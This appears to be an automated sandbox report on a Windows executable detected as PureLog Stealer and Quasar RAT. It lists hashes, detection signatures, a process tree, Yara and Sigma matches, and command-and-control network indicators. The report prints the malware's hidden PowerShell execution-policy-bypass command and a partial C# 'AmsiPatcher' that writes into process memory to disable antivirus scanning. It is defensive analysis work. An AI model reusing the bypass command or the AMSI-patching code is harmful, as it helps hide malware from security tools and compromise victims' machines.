
Windows Analysis Report
PI1qW7yV9K.exe

Overview

General Information

Sample name: PI1qW7yV9K.exe (renamed because the original name is a hash value)
Original sample name: af8da7f9142ae9bdee1fa3be93f0c8c1.exe
Analysis ID: 1665177
MD5: af8da7f9142ae9bdee1fa3be93f0c8c1
SHA1: de5d591e4013f4fa6115a30e3c71d83b74c10bf9
SHA256: 4a6389fb42a4918ca6b7aec6c86a4e945f85dfb6490f873f9be24fa5c7f9df06
Tags: exe, user-abuse_ch

Detection

PureLog Stealer, Quasar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected PureLog Stealer
Yara detected Quasar RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Alternate PowerShell Hosts - PowerShell Module
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PI1qW7yV9K.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\PI1qW7yV9K.exe" MD5: AF8DA7F9142AE9BDEE1FA3BE93F0C8C1)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7816 cmdline: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 6192 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD89C.tmp" "c:\Users\user\AppData\Local\Temp\akylvhfm\CSC15D32CA6BA724B45B0CB2F57F81BE153.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • WMIADAP.exe (PID: 6200 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 3388 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s NcdAutoSetup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 3084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
No configs have been found
Source | Rule | Description | Author | Strings
PI1qW7yV9K.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000008.00000002.2681806308.00000000104F0000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x188d10:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0x17156c:$x4: Uninstalling... good bye :-(
00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp | MAL_BackNet_Nov18_1 | Detects BackNet samples | Florian Roth
  • 0x16e9a9:$s1: ProcessedByFody
  • 0x17577b:$s2: SELECT * FROM AntivirusProduct
00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security

Source | Rule | Description | Author | Strings
8.2.explorer.exe.92b0000.0.raw.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
8.2.explorer.exe.92b0000.0.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
8.2.explorer.exe.290a0000.17.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
8.2.explorer.exe.290a0000.17.unpack | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0x16f76c:$x4: Uninstalling... good bye :-(
8.2.explorer.exe.290a0000.17.unpack | MAL_BackNet_Nov18_1 | Detects BackNet samples | Florian Roth
  • 0x16cba9:$s1: ProcessedByFody
  • 0x17397b:$s2: SELECT * FROM AntivirusProduct

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PI1qW7yV9K.exe", ParentImage: C:\Users\user\Desktop\PI1qW7yV9K.exe, ParentProcessId: 7384, ParentProcessName: PI1qW7yV9K.exe, ProcessCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ProcessId: 7816, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PI1qW7yV9K.exe", ParentImage: C:\Users\user\Desktop\PI1qW7yV9K.exe, ParentProcessId: 7384, ParentProcessName: PI1qW7yV9K.exe, ProcessCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ProcessId: 7816, ProcessName: powershell.exe
Source: Event Logs; Author: Roberto Rodriguez @Cyb3rWard0g; Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 20bf2611-63c3-43b9-8542-4438e7ab1df8 Host Application = C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1 Engine Version = 5.1.19041.1682 Runspace ID = 905a113d-0c9b-44bb-b7e5-806f6cf673a6 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1 Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="TypeDefinition"; value="using System;using System.Diagnostics;using System.Runtime.InteropServices;using System.Text;public class AmsiPatcher{ public const uint PROCESS_VM_OPERATION = 0x0008; public const uint PROCESS_VM_READ = 0x0010; public const uint PROCESS_VM_WRITE = 0x0020; public const uint TH32CS_SNAPPROCESS = 0x00000002; public static byte[] patch = new byte[] { 0xEB }; [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] public struct PROCESSENTRY32 { public uint dwSize; public uint cntUsage; public uint th32ProcessID; public IntPtr th32DefaultHeapID; public uint th32ModuleID; public uint cntThreads; public uint th32ParentProcessID; public int pcPriClassBase; public uint dwFlags; [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 260)] public string szExeFile; } [DllImport("kernel32.dll")] public static extern IntPtr CreateToolhelp32Snapshot(uint dwFlags, uint th32ProcessID); [DllImport("kernel32.dll")] public static extern bool Process32First(IntPtr hSnapshot, ref PROCESSENTRY32 lppe); [DllImport("kernel32.dll")] public static extern bool Process32Next(IntPtr hSnapshot, ref PROCESSENTRY32 lppe); [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr hObject); [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId); [DllImport("kernel32.dll")] public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, IntPtr lpNumberOfBytesRead); [DllImport("kernel32.dll")] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern IntPtr LoadLibraryA(string lpFileName); [DllImport("kernel32.dll")] public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); public static int SearchPattern(byte
Source: Process started; Author: frack113; Data: Command: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PI1qW7yV9K.exe", ParentImage: C:\Users\user\Desktop\PI1qW7yV9K.exe, ParentProcessId: 7384, ParentProcessName: PI1qW7yV9K.exe, ProcessCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ProcessId: 7816, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7816, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", ProcessId: 6192, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7816, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt, ProcessId: 2524, ProcessName: svchost.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7816, TargetFilename: C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PI1qW7yV9K.exe", ParentImage: C:\Users\user\Desktop\PI1qW7yV9K.exe, ParentProcessId: 7384, ParentProcessName: PI1qW7yV9K.exe, ProcessCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ProcessId: 7816, ProcessName: powershell.exe

              Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7816, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline", ProcessId: 6192, ProcessName: csc.exe
              No Suricata rule has matched

              AV Detection

Source: PI1qW7yV9K.exe | Virustotal: Detection: 52%
Source: PI1qW7yV9K.exe | ReversingLabs: Detection: 55%
Source: Yara match | File source: 8.2.explorer.exe.92b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.explorer.exe.92b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2648853929.00000000092B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Neural Call Log Analysis: 99.9%
Source: PI1qW7yV9K.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: PI1qW7yV9K.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.pdbhP source: powershell.exe, 00000002.00000002.1473986709.0000023206903000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.pdb source: powershell.exe, 00000002.00000002.1473986709.0000023206903000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 4x nop then jmp 0136476Fh | 0_2_013646F4
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 4x nop then jmp 0136476Fh | 0_2_01364773

              Networking

Source: C:\Windows\explorer.exe | Network Connect: 15.204.213.5 443
Source: C:\Windows\explorer.exe | Network Connect: 85.192.49.163 4782
Source: global traffic | TCP traffic: 192.168.2.5:49692 -> 85.192.49.163:4782
Source: Joe Sandbox View | IP Address: 15.204.213.5
Source: Joe Sandbox View | ASN Name: DINET-ASRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipwho.is
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0; Host: ipwho.is; Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 85.192.49.163 (25 identical entries)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 identical entries)
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0; Host: ipwho.is; Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: c.pki.goog
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1473986709.0000023205612000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1473986709.00000232049E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1473986709.0000023205612000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1473986709.00000232049E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1473986709.0000023205612000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1473986709.0000023206012000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1548348801.0000023215E57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown | HTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.5:49695 version: TLS 1.2

              E-Banking Fraud

Source: Yara match | File source: 8.2.explorer.exe.92b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.explorer.exe.92b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2648853929.00000000092B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

Source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE | Matched rule: Detects BackNet samples Author: Florian Roth
Source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BackNet samples Author: Florian Roth
Source: 00000008.00000002.2681806308.00000000104F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects BackNet samples Author: Florian Roth
Source: 00000008.00000000.1431061226.00000000104F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000002.00000002.1548348801.0000023217860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe | File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_013640BA
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_01363D70
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_01360CE0
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_0136262F
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_0136410F
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_01364971
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_01364980
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_01360A28
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_0136AA78
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_01363D60
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_05090040
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C7C0652C
Source: C:\Windows\explorer.exe | Code function: 8_2_10679FBC
Source: C:\Windows\explorer.exe | Code function: 8_2_1067A38C
Source: C:\Windows\explorer.exe | Code function: 8_2_1067B264
Source: C:\Windows\explorer.exe | Code function: 8_2_1067A7C4
Source: C:\Windows\explorer.exe | Code function: 8_2_106790C8
Source: PI1qW7yV9K.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: PI1qW7yV9K.exe, 00000000.00000000.1333764956.00000000008B9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFrustrateHook Loader.exeL* vs PI1qW7yV9K.exe
Source: PI1qW7yV9K.exe, 00000000.00000002.1746911837.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PI1qW7yV9K.exe
Source: PI1qW7yV9K.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
